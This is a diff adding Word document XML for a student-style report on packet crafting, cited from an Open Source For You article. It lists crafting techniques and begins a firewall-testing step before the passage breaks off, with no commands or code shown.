+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Crafting, by definition, means to make or create something skillfully. As we know, all the vulnerability assessment tools used by network administrators to test the security of their networks are both a blessing and a curse. This is because the same set of tools can also be used by evil hackers to find vulnerabilities and then exploit those to their benefit. Packet crafting, too, is not an exception to this rule, and since it is a technically advanced yet complex type of vulnerability exploitation, it is difficult to detect and diagnose.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SOURCE: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="21"/>
+            <w:szCs w:val="21"/>
+          </w:rPr>
+          <w:t>http://opensourceforu.com/2012/05/cyber-attacks-explained-packet-crafting/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38651E09" wp14:editId="76D4D05D">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>662940</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>153035</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4290060" cy="2923540"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21394"/>
+                <wp:lineTo x="21485" y="21394"/>
+                <wp:lineTo x="21485" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="1" name="Picture 1" descr="A basic Ethernet and TCPIP packet"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="A basic Ethernet and TCPIP packet"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4290060" cy="2923540"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="277C28C5" wp14:editId="0C5A9494">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>662940</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>187960</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4474210" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="21102"/>
+                    <wp:lineTo x="21520" y="21102"/>
+                    <wp:lineTo x="21520" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="13" name="Text Box 13"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4474210" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>A basic Ethernet and TCP</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>/</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>IP packet</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="277C28C5" id="Text Box 13" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:52.2pt;margin-top:14.8pt;width:352.3pt;height:.05pt;z-index:-251627520;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>1</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>A basic Ethernet and TCP</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>/</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>IP packet</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>acket crafting techniques:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Ping fragmentation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Packet flag manipulation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Packet duplication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Protocol manipulation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Half open packets</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>We will be mainly focusing on packet flag manipulation and half open packets. The steps are:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Step 1: Lay of the land</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70B39B52" wp14:editId="7606156A">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1112520</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>4168140</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4474210" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="21102"/>
+                    <wp:lineTo x="21520" y="21102"/>
+                    <wp:lineTo x="21520" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="3" name="Text Box 3"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4474210" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">1. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>A basic Ethernet and TCP</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>/</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>IP packet</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="70B39B52" id="Text Box 3" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:87.6pt;margin-top:328.2pt;width:352.3pt;height:.05pt;z-index:-251624448;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">1. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>A basic Ethernet and TCP</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>/</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>IP packet</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03376134" wp14:editId="7207BF0A">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-449580</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>294005</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6896100" cy="3875405"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21448"/>
+                <wp:lineTo x="21540" y="21448"/>
+                <wp:lineTo x="21540" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6896100" cy="3875405"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We test </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>firewall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> respons</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to malformed packets</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
